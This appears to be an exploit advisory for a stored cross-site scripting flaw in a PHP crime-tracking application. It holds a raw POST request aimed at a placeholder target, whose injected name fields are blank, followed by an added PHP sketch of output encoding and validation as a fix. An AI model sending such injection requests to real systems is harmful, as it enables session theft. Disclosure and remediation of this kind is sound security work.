# Exploit Title: Company Crime Tracking Software | 'fname,surname,email' Stored Cross Site Scripting
# Exploit Author: Richard Jones
# Date: 01-04-2021
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/12644/company-crime-tracking-system.html
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

POST /caaz/admin/a_employees.php HTTP/1.1
Host: TARGET
Content-Type: multipart/form-data; boundary=---------------------------297905141828527091333499064608
Content-Length: 1010
Cookie: SSESSaca5a63f4c2fc739381fab7741d68783=xVaP07jLGdxx_p3Qsv1qO_3duBIN1XqSJKxxD4hJFkA; PHPSESSID=347sjf013j8s1blsuvsa32hr7r

----------------- snip----------------

-----------------------------297905141828527091333499064608
Content-Disposition: form-data; name="fname"


-----------------------------297905141828527091333499064608
Content-Disposition: form-data; name="surname"


-----------------------------297905141828527091333499064608
Content-Disposition: form-data; name="email"

a@Aa.com
----------------- snip----------------
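
Mitigation sketch for the three stored fields named above, added here as an example; it is not part of the original advisory and not the application's own code. The helper names (h, validate_employee, render_employee_row) and the name-field policy are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helpers, not code from the affected application.

/** Encode a stored value for an HTML text or quoted-attribute context. */
function h(?string $value): string
{
    return htmlspecialchars($value ?? '', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Validate fname, surname and email before they are stored.
 * Returns [values, errors]. Validation narrows what reaches the database;
 * the encoding in h() is what keeps stored markup inert when rendered.
 */
function validate_employee(array $post): array
{
    $values = [];
    $errors = [];
    foreach (['fname', 'surname'] as $field) {
        $value = trim((string)($post[$field] ?? ''));
        // Assumed policy: letters, marks, space, apostrophe, dot, hyphen; 1-64 chars.
        if (!preg_match('/^[\p{L}\p{M}][\p{L}\p{M} \'.\-]{0,63}$/u', $value)) {
            $errors[$field] = 'invalid name';
        }
        $values[$field] = $value;
    }
    $email = trim((string)($post['email'] ?? ''));
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        $errors['email'] = 'invalid email';
    }
    $values['email'] = $email;
    return [$values, $errors];
}

/** Render one employee table row with every stored field encoded on output. */
function render_employee_row(array $row): string
{
    return sprintf(
        '<tr><td>%s</td><td>%s</td><td>%s</td></tr>',
        h($row['fname'] ?? ''), h($row['surname'] ?? ''), h($row['email'] ?? '')
    );
}

// Constructed sample: a record that already contains markup, as a legacy row might.
$legacy = ['fname' => '<b>Ann</b>', 'surname' => 'O"Neil', 'email' => 'a@Aa.com'];
echo render_employee_row($legacy), PHP_EOL;   // markup is emitted as text
[$values, $errors] = validate_employee($legacy);
print_r($errors);                             // fields a new submission would fail on
```

Encoding at render time covers rows stored before any input validation existed, so both layers are needed.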